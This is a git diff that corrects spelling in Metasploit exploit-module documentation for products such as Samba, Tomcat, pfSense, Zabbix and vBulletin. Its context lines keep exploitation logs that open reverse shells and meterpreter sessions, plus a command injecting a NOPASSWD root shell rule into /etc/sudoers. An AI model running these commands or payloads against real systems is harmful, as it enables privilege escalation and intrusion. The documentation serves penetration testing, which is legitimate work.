b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md index cc72b7d17b39..9fab3b0792df 100644 --- a/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md +++ b/documentation/modules/exploit/linux/local/juju_run_agent_priv_esc.md @@ -29,7 +29,7 @@ The following installation instructions are for Ubuntu 14.04.1 LTS ("trusty"). ```sh - # List avilable juju packages + # List available juju packages apt-cache showpkg juju # Install a vulnerable package diff --git a/documentation/modules/exploit/linux/local/service_persistence.md b/documentation/modules/exploit/linux/local/service_persistence.md index 3aafbe72bf14..f1406537ada9 100644 --- a/documentation/modules/exploit/linux/local/service_persistence.md +++ b/documentation/modules/exploit/linux/local/service_persistence.md @@ -184,7 +184,7 @@ Now with a multi handler, we can catch Upstart restarting the process every 10se ### systemd (Ubuntu 16.04 Server - root) Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works. -While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode. +While python shellcode works on previous systems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode. Get initial access diff --git a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md index 8923bd056914..e30129861775 100644 --- a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md +++ b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md @@ -142,7 +142,7 @@ resource (sudoedit.rb)> exploit [*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf [*] Adding user to sudoers [*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # SbccIOwAiK1i' -- /etc/sudoers" sudo -S -e /etc/motd -[+] Likely successful exploitation, detected possitive error message: editing files in a writable directory is not permitted +[+] Likely successful exploitation, detected positive error message: editing files in a writable directory is not permitted [*] sudo: --: editing files in a writable directory is not permitted [*] Spawning payload [*] Transmitting intermediate stager...(126 bytes) diff --git a/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md b/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md index c2f6ecbfa5fc..bd489a07abba 100644 --- a/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md +++ b/documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md @@ -1,8 +1,8 @@ ## Vulnerable Application -This module exploits a buffer-overflow in multiple Zyxel devices. The vulnerabilitiy stems from missing string length +This module exploits a buffer-overflow in multiple Zyxel devices. The vulnerability stems from missing string length checks. The vulnerability can only be exploited from the LAN side, but does not require authentication. As ASLR is -activated, the libc address will be bruteforced. Thus the webserver will crash until successfull exploitation. On +activated, the libc address will be bruteforced. Thus the webserver will crash until successful exploitation. On average this process takes 20 minutes. This vulnerability was discovered by Steffen Robertz, Gerhard Hechenberger, Stefan Viehboeck and Thomas Weber of the SEC diff --git a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md index bd622c86f4e2..8bd20a399ef3 100644 --- a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md +++ b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md @@ -30,7 +30,7 @@ compile it to a redis module file during running, which is more undetectable. It's only worked on linux system. For other scenarios, such as lack of gcc, or others opreate systems, framework -could not compile the source for sucessful exploit, it uses the +could not compile the source for successful exploit, it uses the pre-compiled redis module to accomplish this exploit. ## Scenarios diff --git a/documentation/modules/exploit/linux/samba/is_known_pipename.md b/documentation/modules/exploit/linux/samba/is_known_pipename.md index 0757631b876e..4ef19bfe5258 100644 --- a/documentation/modules/exploit/linux/samba/is_known_pipename.md +++ b/documentation/modules/exploit/linux/samba/is_known_pipename.md @@ -18,7 +18,7 @@ where no SMB options are required to be set: comment = CVE-2017-7494 path = /tmp writable = yes -browseable = yes +browsable = yes guest ok = yes ``` diff --git a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md index 477e7f57c2d7..e136b923a587 100644 --- a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md +++ b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md @@ -71,7 +71,7 @@ [*] 192.168.1.1:445 - Calling the vulnerable function... [*] 192.168.1.1:445 - Server did not respond, this is expected - ...Some intermediate attempts ommitted... + ...Some intermediate attempts omitted... [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55996000... [*] 192.168.1.1:445 - Connecting to the SMB service... diff --git a/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md b/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md index 84a84f8be783..4be4d90e3140 100644 --- a/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md +++ b/documentation/modules/exploit/mainframe/ftp/ftp_jcl_creds.md @@ -20,7 +20,7 @@ Compatible Payloads Name Disclosure Date Rank Description ---- --------------- ---- ----------- - cmd/mainframe/apf_privesc_jcl normal JCL to escalate privilages via APF LIB + cmd/mainframe/apf_privesc_jcl normal JCL to escalate privileges via APF LIB cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP diff --git a/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md b/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md index eea6baf80c1a..6add9e294bf2 100644 --- a/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md +++ b/documentation/modules/exploit/multi/http/apache_flink_jar_upload_exec.md @@ -46,7 +46,7 @@ msf6 exploit(multi/http/apache_flink_jar_upload_exec) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. Apache Flink version 1.9.3. [*] Uploading JAR payload 'bxAGPHOcppvL.jar' (5309 bytes) ... -[*] Retrieving list of avialable JAR files ... +[*] Retrieving list of available JAR files ... [+] Found uploaded JAR file 'b4222291-a682-4788-9d43-44ebe5b18426_bxAGPHOcppvL.jar' [*] Executing JAR payload 'b4222291-a682-4788-9d43-44ebe5b18426_bxAGPHOcppvL.jar' entry class 'metasploit.Payload' ... [*] Sending stage (58147 bytes) to 172.16.191.194 @@ -79,7 +79,7 @@ msf6 exploit(multi/http/apache_flink_jar_upload_exec) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. Apache Flink version 1.11.2. [*] Uploading JAR payload 'JhnJgOxev.jar' (5309 bytes) ... -[*] Retrieving list of avialable JAR files ... +[*] Retrieving list of available JAR files ... [+] Found uploaded JAR file '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar' [*] Executing JAR payload '67c7fb3f-81a0-4518-a67c-e375ae5f2d03_JhnJgOxev.jar' entry class 'metasploit.Payload' ... [*] Sending stage (58147 bytes) to 172.16.191.193 diff --git a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md index 1bd67565e517..4bb282125b6c 100644 --- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md +++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md @@ -26,7 +26,7 @@ If authentication and authorisation is enabled, the account used must have the f execution using this module: * Permission to "view" and "modify" the root controller. -* Permmission to "access restricted components", "regardless of restrictions". +* Permission to "access restricted components", "regardless of restrictions". If authentication is required, then the `USERNAME` and `PASSWORD` options can be used to specify credentials. Alternatively, if a more complex authentication flow is required (such as OpenId Connect), or a session token has already been obtained, a session token in the form diff --git a/documentation/modules/exploit/multi/http/cockpit_cms_rce.md b/documentation/modules/exploit/multi/http/cockpit_cms_rce.md index 3f3c7afb7346..146d48704747 100644 --- a/documentation/modules/exploit/multi/http/cockpit_cms_rce.md +++ b/documentation/modules/exploit/multi/http/cockpit_cms_rce.md @@ -1,7 +1,7 @@ ## Vulnerable Application This module exploits two NoSQLi vulnerabilities to retrieve the user list, -and password reset tokens from the system. Next, the USER is targetted to +and password reset tokens from the system. Next, the USER is targeted to reset their password. Then a command injection vulnerability is used to execute the payload. diff --git a/documentation/modules/exploit/multi/http/horde_form_file_upload.md b/documentation/modules/exploit/multi/http/horde_form_file_upload.md index 1d366dca0dae..2b7422ac10a9 100644 --- a/documentation/modules/exploit/multi/http/horde_form_file_upload.md +++ b/documentation/modules/exploit/multi/http/horde_form_file_upload.md @@ -6,7 +6,7 @@ The Horde subcomponent Horde Form < 2.0.19 is affected. This module was specific ### Docker install on Ubuntu 18.04 -Please folow these steps to setup a vulnerable version of Horde in Docker on a Ubuntu. +Please follow these steps to setup a vulnerable version of Horde in Docker on a Ubuntu. 1. Set up a [Ubuntu](http://www.ubuntu.com/) 18.04 box. 2. Open a terminal, and enter: ```sudo apt-get install docker.io```. Make sure Docker is properly configured and your current user has permession to use it. diff --git a/documentation/modules/exploit/multi/http/magento_unserialize.md b/documentation/modules/exploit/multi/http/magento_unserialize.md index 43ad2331c2f9..572e263f1a52 100644 --- a/documentation/modules/exploit/multi/http/magento_unserialize.md +++ b/documentation/modules/exploit/multi/http/magento_unserialize.md @@ -68,7 +68,7 @@ If at some point the IP (base URL) of Magento has changed, then you will need to 1. From the terminal, do: ```mysql -h localhost -u [username] -p[password]``` 2. In the SQL prompt, do: ```use [magento database name]``` -3. Do: ```select * from core_config_data;```, you should see both web/unsecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP. +3. Do: ```select * from core_config_data;```, you should see both web/insecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP. 4. Do: ```update core_config_data set value='http://[IP]/' where config_id=2;``` 5. Do: ```update core_config_data set value='https://[IP]/' where config_id=3;``` 6. Back to the Magento directory, do: ```sudo rm -rf var/cache/*``` diff --git a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md index 8dff6df06f39..0345eec78da8 100644 --- a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md +++ b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md @@ -84,7 +84,7 @@ LHOST => 10.10.10.2 msf exploit(makoserver_cmd_exec) > check [*] Trying to detect running Mako Server and necessary files... -[*] Mako Server save.lsp returns correct ouput. +[*] Mako Server save.lsp returns correct output. [*] 10.10.10.3:80 The target appears to be vulnerable. msf exploit(makoserver_cmd_exec) > exploit diff --git a/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md b/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md index 05baa98f1dcb..2704ec534b41 100644 --- a/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md +++ b/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md @@ -49,7 +49,7 @@ msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > run [*] Started reverse TCP handler on 10.0.0.1:4444 [*] 10.0.0.100:8443 - Attacking Windows target -[+] 10.0.0.100:8443 - Succesfully authenticated and obtained our cookie! +[+] 10.0.0.100:8443 - Successfully authenticated and obtained our cookie! [*] 10.0.0.100:8443 - Sending payload to /services/DataAcquisitionService [+] 10.0.0.100:8443 - Success, shell incoming! [*] Sending stage (175174 bytes) to 10.0.0.100 diff --git a/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md b/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md index 11f1ae6e1a77..c5be6abf683d 100644 --- a/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md +++ b/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md @@ -26,7 +26,7 @@ Moodle provides a step by step guide to install their software ## Options -### Passowrd +### Password Password of an administrator. diff --git a/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md b/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md index 7453fd241edc..432907441046 100644 --- a/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md +++ b/documentation/modules/exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce.md @@ -16,7 +16,7 @@ This module was tested against Moodle version 3.9 ### Install Moodle provides a step by step guide to install their software. However you'll want to use -`3.9.0` isntead of `3.11.0`. +`3.9.0` instead of `3.11.0`. [here](https://docs.moodle.org/311/en/Step-by-step_Installation_Guide_for_Ubuntu) ## Verification Steps @@ -35,7 +35,7 @@ Moodle provides a step by step guide to install their software. However you'll The amount of users to add to the class in hopes of finding a manager. Defaults to `100`. -### Passowrd +### Password Password of a teacher. diff --git a/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md b/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md index 2f86ecc74012..3490f38a1155 100644 --- a/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md +++ b/documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md @@ -10,7 +10,7 @@ products that are built on top of the OpManager application. This vulnerability #### CVE-2020-28653 This vulnerability affects OpManager versions 12.1 - 12.5.232. The vulnerability involves sending a malicious PDU to the -SmartUpdateManager handler that when deserialized executes an arbitary OS command. +SmartUpdateManager handler that when deserialized executes an arbitrary OS command. #### CVE-2021-3287 This vulnerability is a patch bypass for CVE-2020-28653 and affects OpManager versions 12.5.233 - 12.5.328. When the diff --git a/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md b/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md index 6b0461d0d2f7..add3702dfc3b 100644 --- a/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md +++ b/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md @@ -6,7 +6,7 @@ to the sendmail binary. This module writes a payload to the web root of the webs HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes. -[5.1.18](https://github.com/PHPMailer/PHPMailer/archive/v5.2.18.tar.gz) is also targetted. +[5.1.18](https://github.com/PHPMailer/PHPMailer/archive/v5.2.18.tar.gz) is also targeted. ## Verification Steps diff --git a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md index c1a563c1cad5..b44811fe54bf 100644 --- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md +++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md @@ -35,7 +35,7 @@ The module has been tested against qdPM version 9.1 As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected. - **Attacking with a generic PHP payload, OS independed** + **Attacking with a generic PHP payload, OS independent** ``` [msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload) diff --git a/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md b/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md index e1a515e3d586..8806ea2eb14b 100644 --- a/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md +++ b/documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md @@ -12,7 +12,7 @@ but it should be roughly the following steps: * The default creds are admin/password, but at some point you'll need to log in with your mysonicwall.com account * Eventually you'll be asked the install a license * Go back to https://www.mysonicwall.com -* On the left hand side menu go to "Product Mangement" -> "Trial Software" +* On the left hand side menu go to "Product Management" -> "Trial Software" * Scroll down to "GMS" click on "Try Now" * Enter a "Friendly name" - this can be anything - click on "Try Now" * You should see a success message diff --git a/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md b/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md index 70b74a610052..0a4aaf3f20da 100644 --- a/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md @@ -3,7 +3,7 @@ The Apache Struts framework, when forced, performs double evaluation of attribut attributes such as `id`. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). -This vulnerability is application dependant. A server side template must make an affected use of request data to +This vulnerability is application dependent. A server side template must make an affected use of request data to render an HTML tag attribute. Vulnerable versions of Apache Struts for both CVEs are provided by [vulhub][1] on GitHub. The setup instructions are identical diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md index db7af1adde68..8606b274a544 100644 --- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md @@ -15,7 +15,7 @@ This module is VERY similar to `exploit/multi/http/tomcat_mgr_upload`, the main 1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe) -The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax. +The install was default, other than adding a user during install. No other options were changed. The install assigned the new user the role `manager-gui`, which is Tomcat 7+ syntax. For this exploitation, it was changed to simply `manager`. #### Exploitation diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md b/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md index d7abcd7bd675..090f42e46a06 100644 --- a/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md @@ -104,7 +104,7 @@ meterpreter > 1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe) -The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax. +The install was default, other than adding a user during install. No other options were changed. The install assigned the new user the role `manager-gui`, which is Tomcat 7+ syntax. For this exploitation, it was changed to simply `manager`. #### Exploitation diff --git a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md index 87f409bce99c..5b39ecf7fb30 100644 --- a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md +++ b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md @@ -123,10 +123,10 @@ msf5 exploit(multi/http/vbulletin_getindexablecontent) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. [*] Brute forcing to find a valid node id. -[+] Sucessfully found node at id 1 +[+] Successfully found node at id 1 [*] Attempting to determine the vBulletin table prefix. [*] Performing SQL injection on target to retrieve 'table_name' from 'information_schema.columns'. -[+] Sucessfully retrieved table to get prefix from vb5_language. +[+] Successfully retrieved table to get prefix from vb5_language. [*] Performing SQL injection on target to retrieve 'userid' from 'vb5_administrator'. [*] Performing SQL injection on target to retrieve 'username' from 'vb5_user'. [*] Performing SQL injection on target to retrieve 'token' from 'vb5_user'. @@ -154,7 +154,7 @@ msf5 exploit(multi/http/vbulletin_getindexablecontent) > run [*] Making request to '/vb5/ajax/api/widget/saveAdminConfig' to add payload to widget. [+] Successfully added payload to widget. [*] Sending request to '/vb5/admin/savepage' to save new page at 'OToB9nTU'. -[+] Page succesfully create and should be accessible at '/vb5/OToB9nTU'. +[+] Page successfully create and should be accessible at '/vb5/OToB9nTU'. [+] Executing PHP payload (230 bytes) at /vb5/OToB9nTU. [*] Sending request to '/vb5/OToB9nTU' to execute payload. [*] Sending delete page request to '/vb5/ajax/api/page/delete'. diff --git a/documentation/modules/exploit/multi/http/zabbix_script_exec.md b/documentation/modules/exploit/multi/http/zabbix_script_exec.md index f3997a9cf9ea..f1fdd7a0965e 100644 --- a/documentation/modules/exploit/multi/http/zabbix_script_exec.md +++ b/documentation/modules/exploit/multi/http/zabbix_script_exec.md @@ -7,7 +7,7 @@ Zabbix server allow remote command execution by two different way. The first way happen with the directive `AllowKey=system.run[*]` [[1]](https://blog.zabbix.com/zabbix-remote-commands/7500/#system.run). This directive is disabled by default, if an attacker already know Zabbix credentials -and the directive is enabled, he can abuse this functionnality to take control over the Zabbix server. +and the directive is enabled, he can abuse this functionality to take control over the Zabbix server. The second way is by creating a script [[2]](https://www.zabbix.com/documentation/devel/en/manual/web_interface/frontend_sections/administration/scripts) @@ -47,7 +47,7 @@ the directive `AllowKey=system.run[*]` is enabled in the `zabbix-agentd.conf` fi Communication between an agent and the server can be encrypted with TLS using a PSK (pre-shared key). If the server is configured to enforce that, you have to get the key from the web interface (browse inside a host -and navigate to `Encryption` tab) and specifiy it with this option, otherwise RCE is not gonna happen. +and navigate to `Encryption` tab) and specify it with this option, otherwise RCE is not gonna happen. ### TLS_PSK_IDENTITY @@ -68,7 +68,7 @@ msf6 exploit(multi/http/zabbix_script_exec) > set LHOST eth0 LHOST => 192.168.0.129 msf6 exploit(multi/http/zabbix_script_exec) > run [*] Started reverse TCP handler on 192.168.0.129:4444 -[+] Sucessfully logged in +[+] Successfully logged in [*] Getting a valid group id... [*] Creating a host called kTsSUTGmgKCwcsbMjZ [*] Using URL: http://0.0.0.0:8081/4J54NLVPQsj diff --git a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md index 5b4e1a3b4e9a..2dd9fd8d0a01 100644 --- a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md +++ b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md @@ -1,6 +1,6 @@ ## Vulnerable Application -This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder. +This vulnerability exploits mysql by adding a .so or .dll file which has a system call in it to the plugins folder. The Windows dll files are provided by [@stamparm](https://github.com/stamparm) of the sqlmap project and are located [here](https://github.com/rapid7/metasploit-framework/files/1879611/mysql_udf_libs.zip). As noted in [#9677](https://github.com/rapid7/metasploit-framework/issues/9677#issuecomment-378893925) these are 'de-cloaked' versions, diff --git a/documentation/modules/exploit/multi/php/jorani_path_trav.md b/documentation/modules/exploit/multi/php/jorani_path_trav.md index 9ce0265c3299..027b5afcf71c 100644 --- a/documentation/modules/exploit/multi/php/jorani_path_trav.md +++ b/documentation/modules/exploit/multi/php/jorani_path_trav.md @@ -16,7 +16,7 @@ So the scripts will not stop after the redirection because an exit statement is Because of this, the attacker can make the script continue and reach the LFI vulnerability without being authenticated. -So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application. +So by chaining these 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application. This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75. diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md index d34331228f34..2d22e8cf1bc6 100644 --- a/documentation/modules/exploit/multi/script/web_delivery.md +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -129,7 +129,7 @@ These instructions will create a cgi environment and a vulnerable perl applicati #### Setup -In this example, we make a `post` form that pings a user provided IP, which is a typical funtion on many routers and is often abused a similar manner. +In this example, we make a `post` form that pings a user provided IP, which is a typical function on many routers and is often abused a similar manner. 1. Enable cgi: `a2enmod cgid` 2. `mkdir /var/www/cgi-bin` diff --git a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md index 579262f8755e..f631f6d90186 100644 --- a/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md +++ b/documentation/modules/exploit/osx/local/timemachine_cmd_injection.md @@ -2,7 +2,7 @@ This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers from a command injection vulnerability that can be exploited by creating a specially crafted disk label. -The tmdiagnose binary uses awk to list every mounted volume, and composes shell commands based on the volume labels. By creating a volume label with the backtick character, we can have our own binary executed with root priviledges. +The tmdiagnose binary uses awk to list every mounted volume, and composes shell commands based on the volume labels. By creating a volume label with the backtick character, we can have our own binary executed with root privileges. ## Verification Steps diff --git a/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md b/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md index c79c853950ae..fff17865819e 100644 --- a/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md +++ b/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md @@ -1,6 +1,6 @@ ## Vulnerable Application -This module exploits an authenticated command injection vulnerabilty in the `restore_rrddata()` function of +This module exploits an authenticated command injection vulnerability in the `restore_rrddata()` function of pfSense prior to 2.7.0 which allows an authenticated attacker with the `WebCfg - Diagnostics: Backup & Restore` privilege to execute arbitrary operating system commands as the `root` user. diff --git a/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md b/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md index a673108e3247..b864a5403687 100644 --- a/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md +++ b/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md @@ -34,7 +34,7 @@ LHOST => 1.1.1.1 msf exploit(unix/http/pfsense_graph_injection_exec) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 -[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload +[*] Detected pfSense 2.2.6-RELEASE, uploading initial payload [*] Payload uploaded successfully, executing [*] Sending stage (37543 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600 @@ -61,7 +61,7 @@ PAYLOAD => php/reverse_php msf exploit(unix/http/pfsense_graph_injection_exec) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 -[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload +[*] Detected pfSense 2.1.3-RELEASE, uploading initial payload [*] Payload uploaded successfully, executing [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600 uname -a diff --git a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md index d7191f61d993..f7e78eb9ee34 100644 --- a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md +++ b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md @@ -7,7 +7,7 @@ ## Vulnerable Application - Unfortunately a virtual copy of this camera is not avaiable. + Unfortunately a virtual copy of this camera is not available. ## Verification Steps diff --git a/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md index 94d04ca2f0c4..a60e36ece20f 100644 --- a/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md +++ b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md @@ -1,4 +1,4 @@ -Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator` +Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similar operand , similar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator` ## Vulnerable Application @@ -11,7 +11,7 @@ the devices. ## Payloads -Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic` +Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitrary command with `cmd/unix/generic` ``` Compatible Payloads diff --git a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md index 50f50552809c..61c20318dd82 100644 --- a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md +++ b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md @@ -8,7 +8,7 @@ If this succeeds, the target may be vulnerable. The module then proceeds by issuing an HTTP GET request for /bolt/overview/showcases in order to obtain a CSRF token to be used later. Next, the module obtains a list of filename tokens from `/async/browse/cache/.sessions.` -These tokens are used to create files with the blacklisted `.php` extention via HTTP POST requests to `/async/folder/rename`. +These tokens are used to create files with the blacklisted `.php` extension via HTTP POST requests to `/async/folder/rename`. With the CSRF token obtained before, it is possible to create .php files by "renaming" these cache tokens. While most (if not all) available tokens can be used to created .php files in the /root directory on the server, the resulting files cannot always be used to execute commands. diff --git a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md index 6dd4dcd0407a..be4b43864e10 100644 --- a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md @@ -13,7 +13,7 @@ 